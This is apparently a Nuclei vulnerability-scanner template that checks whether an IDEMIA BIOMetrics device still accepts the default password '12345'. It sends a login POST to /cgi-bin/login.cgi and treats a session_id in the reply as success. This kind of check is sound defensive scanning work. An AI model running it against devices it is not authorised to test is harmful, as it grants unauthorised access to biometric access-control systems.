id: idemia-biometrics-default-login

info:
  name: IDEMIA BIOMetrics Default Login
  author: Techryptic (@Tech)
  severity: high
  description: Default Login of password=12345 on IDEMIA BIOMetrics application.
  reference: https://www.google.com/search?q=idemia+password%3D+"12345"
  tags: idemia,biometrics,default-login

requests:
  - raw:
      - |
        POST /cgi-bin/login.cgi HTTP/1.1
        Host: {{Hostname}}

        password={{password}}

    payloads:
      password:
        - "12345"

    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - "session_id="
          - "resource"

      - type: word
        part: body
        negative: true
        words:
          - "Invalid Password"

      - type: status
        status:
          - 200